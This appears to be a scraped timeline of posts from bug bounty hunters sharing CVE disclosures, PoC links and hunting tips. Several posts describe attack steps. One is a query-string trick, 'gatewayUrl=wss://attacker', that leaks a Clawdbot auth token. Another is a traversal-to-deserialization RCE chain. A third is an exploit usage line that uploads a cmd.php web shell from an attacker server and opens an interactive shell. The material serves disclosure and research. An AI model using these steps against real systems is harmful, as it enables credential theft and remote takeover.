jp / kw0

Happy to secure @Google! Thrilled to share my first contribution; after a professional code review with Google engineers and passing all CI checks, the fix is officially merged. github.com/google/neurogl…

I have a DoS bug affecting a WordPress plugin with over 2 million active installations. However, it’s out of scope of the program. Curious, isn't it? @WordPress #WordPress #Hacking #BugBounty #BugBountyLife hackerone.com/wordpress

The worst enemy of a bug bounty hunter who prioritizes manual testing: rabbit holes; they cause demotivation, wasted time, and a hopeless loss of focus. If you don’t have, right in front of you, a report that shows an attacker-to-victim flow, forget it and don’t report it. ✌️

@4osp3l WTF

@7h3h4ckv157 @thedawgyg Agree.

@thedawgyg Some docs are directing towards the actual threats:)

Never stop reading docs your target puts out about their products. Especially the security related items. Looking at one of the vulns i have stashed as a 'bug', as i think i may be able to do something that would make this actually bounty eligible on its own, and not needing to be chained to be accepted. So I know what I will be doing today (in between my cleaning and yard work i absolutely have to do since its over 70 outside lol)

GitHub - JoshuaProvoste/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud: Technical PoC for CVE-2026-2472 (GCP-2026-011): Unauthenticated and Stored Cross-Site Scripting (XSS) in google-cloud-aiplatform _genai/_evals_visualization (Vertex AI Python SDK) github.com/JoshuaProvoste…

@7h3h4ckv157 We can do it

@JoshuaProvoste 🔥

PoC/Exploit for CVE-2026-2472 – Unauthenticated Stored Cross-Site Scripting (XSS) in the Official Vertex AI SDK for Google Cloud github.com/JoshuaProvoste… #BugBounty #Hacking #AI #GoogleCloud #VertexAI

@7h3h4ckv157 Go for the next challenge. 🔥🔥

27/02/2026: Update 📍 I have never committed a single crime till today. I am stepping away from the 100 day challenge and may/may not continue it privately. Trying to make the internet secure is no longer my goal. I will still be around for infosec. Thanks for all the support.

@ngosytuanbug @jmo740 Cool and nice moai

first time try this - fuzz path - run dast path traversal template - got bounty thank @jmo740 #BugBounty

Thank you so much, @78_lab, for sharing my research on Command Injection/RCE in PyGlove 🙌 linkedin.com/pulse/20260114… #Hacking #Cybersecurity #RCE

@0xacb Cool, really creative PoC!! 😄

🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…

@0xacb @spaceraccoon Interesting, it was never a 404 page lol

404 page to RCE. A report by @spaceraccoon He chained two old CVEs to achieve RCE: - Found a 404 page mentioning an obscure CMS, discovered /josso/signin login - Triggered CVE-2007-0450 (directory traversal in mod_proxy) using a %5C../ to bypass the internal proxy - Reached an unprotected JBoss web console on localhost (CVE-2007-1036) - Exploited Java deserialization with jexboss tool for full RCE Full report 👇 hackerone.com/reports/502758

Good conversation with @GoogleDeepMind engineers about how to remediate an RCE in AlphaFold3, the AI used to predict the structure of molecules. github.com/google-deepmin… Thanks for acknowledging the vulnerability! 🙌 #Hacking #AI #Google #AlphaFold #Cybersecurity

My friend @JoshuaProvoste 🤞🏻😍

@7h3h4ckv157 😂🫠

Thanks for mention 😇 @DarkWebInformer darkwebinformer.com/cve-2024-9932-…

‼️ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE). GitHub: github.com/JoshuaProvoste… Type: 0-Click RCE Exploit Usage: python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.

@badcrack3r Agree

you can only win when your mind is stronger than your emotions